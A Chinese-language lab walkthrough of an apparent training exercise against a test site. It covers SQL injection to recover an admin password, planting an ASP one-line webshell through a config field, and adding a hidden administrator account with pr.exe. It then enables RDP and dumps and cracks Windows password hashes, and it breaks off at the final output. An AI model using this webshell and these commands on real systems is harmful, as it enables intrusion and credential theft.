《我很简单，请不要欺负我》实验攻略

我本来准备自己写的，因为这里边太多坑了，我想好好记录下这次简单的却实际操作起来如此的艰难的实验

图片是一项很大的工程，我放弃了，在转载的时候只用别人的图片或删除他的或增加我的见解，加入自己见解，这算自己的东西了吧

他的实验中直接先是扫描后台，然后扫描Sql注入跑管理员账号密码，这是正确的步骤

然而我 ... 上来直接扫描后台 ，然后弱密码(admin888)直接登陆进去 ....

我还疑惑为什么提示有一些不认识的工具，百度下，原来是类似Sqlmap 的界面化工具 ....

所以我起步就在后台找上传shell的地方 ....

Step 1 目录扫描目录扫描
工具：御剑
路径：C:\Tools\目录扫描\
打开御剑，在域名中输入http://www.test.ichunqiu，开始扫描；

在目录列表中查找后台，发现存在/admin

双击打开后台登录页面http://www.test.ichunqiu/admin

不过用户名和密码都不知道，没关系，进行下一步：获取用户名和密码。 Step 2工具：旁注WEB综合检测程序Ver3.6修正版
路径：C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打开工具，依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点]；

出现下面这个对话框说明已经检测完毕；

点击OK进行下一步；
注入点分析完毕后，会在下方列表中显示可注入的地址，选择其中一个地址，右键选择 [检测注入]；

点击 [检测注入] 后，主界面从 [批量扫描注入点] 转到 [SQL注入猜解检测]，点击 [开始检测]；

检测完毕后，显示可以注入，并列出了数据库类型：Access数据库；

下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容]；点击 [猜解表名] 后，在数据库列表中会显示4个表，分别是admin、user、movie和news；

选择admin表，点击 [猜解列名]，成功猜解出三个列名id、username和password；

勾选username和password，点击 [猜解内容]，右侧列表中成功显示用户名admin，密码469e80d32c0559f8

当然密码是MD5加密的，打开本机浏览器，输入http://www.cmd5.com，输入刚刚查询到的密文，点击 [解密]；

成功找到明文密码：admin888；
注入的方法与工具很多，或者也可以这样：在浏览器中打开网站首页http://www.test.ichunqiu，在最新产品中随便选择一个打开 [注入点太多]；

复制URL [www.test.ichunqiu/ProductShow.asp?ID=7]，使用工具：穿山甲
工具：[穿山甲Pangolin]
路径： C:\Tools\注入工具\pangolin
Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞，从而达到获取、修改、删除数据，甚至控制数据库服务器、Web服务器的目的的测试方法；

打开穿山甲，输入URL，点击绿色三角箭头进行注入操作；

点击 [Dates] 切换到Dates选项卡，点击 [Tables] 成功猜解出4张表；

获取内容的原理同Domain的使用方法一样，[猜解表名]-->[猜解列名]-->[猜解内容]；

同样能获取用户名和密码；

下一步：登录后台，上传木马； Setp 3打开后台登录页面，输入用户名admin，密码admin888，输入验证码，点击 [ENTER] 登录后台；

久违的后台终于进去了….

点击左侧菜单栏中的 [系统设置管理]-->[网站信息配置]，用修改配置文件的方法获取WebShell；
#########################
# 到这里为止，我一直认为是上传文件，因为前不久刚学过任意文件上传
# 谁知道这里写入shell这么奇葩，不过确实可行 ....
#########################

打开相应页面后，将 [公司名称] 内容修改为一句话木马 "%><%Eval Request(Chr(35))%><%'
写一句话木马的时候注意闭合；

########################

# 这里不太明白构造的payload为什么 前边是双引号 ，后边是单引号，如果有谁明白，麻烦告诉我下

# 我认为不应该前边和后边都是双引号么？

########################

点击最下面的 [保存设置] 按钮；

如果插马成功，[公司名称] 内容为空；

打开 [中国菜刀] 连接一句话木马；
工具：中国菜刀 路径：C:\Tools\webshell\中国菜刀

打开菜刀，右键空白处，选择 [添加]；

在地址栏中输入http://www.test.ichunqiu/inc/config.asp，为什么是这个路径？因为我们刚才修改的网站信息配置页面，就是这个路径，可以自己下载一个魅力企业网站管理系统源码看看，2007或2009版的都行，里面的目录结构一目了然；
连接密码为#，密码为什么是#？ 往上看一句话木马，里面有个chr(35)，#的ascii码就是35，当然这个密码可以随便设置，只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可，点击 [添加]；

添加成功后会新增一条记录；

双击这个URL，成功进入！

Step 4进入C:\RECYCLER目录，准备上传提权工具；当然可写的目录不知这一个，还有其他的；

提权工具包括pr，3389，cmd，路径：C:\Tools\提权工具\windows

开始上传工具，选中这三个文件，用鼠标直接拖到中国菜刀中，即可完成上传；

上传成功；

下一步，执行提权操作；
右键cmd.exe，选择 [虚拟终端]

成功进入，将目录切换到C:\RECYCLER

用pr.exe执行cmd命令，添加账户；
pr "net user hacker 123 /add"
第一次执行命令有可能不成功，怎么办？
#############################
# 我在这里可不是一次两次没有执行成功啊，这可是十几次的不成功啊 ！！！
# 然后我退出菜刀，清空缓存，重新连接几次才成功
#############################

没关系，再执行一次就OK了；

账户添加成功，下一步，将hacker账户添加到系统管理员组；
pr "net localgroup administrators hacker /add"

添加成功，下一步，开启3389；
pr 3389

如果出现如上图中的一大堆命令，说明执行成功了，不成功就多执行几次命令，下一步，连接目标机；
[开始]-->[运行]-->mstsc

如果找不见目标IP地址，请点击右上角 [场景拓扑图] 进行查看：

输入目标IP地址：172.16.12.2，开始连接，继续输入用户名hacker和密码123，进入系统；

3389连接成功！下一步，获取系统管理员密码，准确的说是获取系统管理员密码的hash，上传密码获取工具 ，还是使用菜刀上传；

工具一大堆，随便用，这里我们使用QuarksPwDum，开始上传；

上传成功，进入目标机，运行QuarksPwDump
注：打开cmd，用命令行启动QuarksPwDump，不要直接双击；

运行后，会出现如下界面：

继续输入命令：
QuarksPwDump --dump-hash-local

执行后的结果如下：

成功获取到administrator的hash：62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85
暂时切换出实验环境，在你的电脑上打开浏览器输入http://www.objectif-securite.ch/en/ophcrack.php，在页面的相应位置输入hash，然后GO；
ps：如果打不开就翻墙，或者用其他类似功能的网站也可以，这样的站点很多；

最终结果输出：